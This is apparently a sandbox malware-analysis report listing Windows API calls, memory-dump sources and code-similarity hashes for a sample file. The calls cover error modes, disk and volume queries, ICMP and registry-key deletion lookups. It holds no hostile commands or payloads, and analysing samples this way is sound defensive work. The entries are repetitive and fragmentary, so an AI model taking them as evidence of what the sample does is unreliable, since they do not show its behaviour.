                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                                                                                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                                                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 2507767853-234962358
                                                                                                                                                                                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 2507767853-234962358
                                                                                                                                                                                                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                                                                                                                • String ID: crts
                                                                                                                                                                                                                • API String ID: 943502515-3724388283
                                                                                                                                                                                                                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                                                                                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                                                                                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$LabelVolume
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 2006950084-234962358
APIs
• Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetMenuItemInfoW.USER32 ref: 00449727
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
• DrawMenuBar.USER32 ref: 00449761
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _wcslen$_wcscpy
• String ID: 3, 3, 8, 1
• API String ID: 3469035223-357260408
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2808897238-0
                                                                                                                                                                                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                                                                                                                • __itow.LIBCMT ref: 004699CD
                                                                                                                                                                                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                                                                                                                • __itow.LIBCMT ref: 00469A97
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$__itow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3379773720-0
                                                                                                                                                                                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                                                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
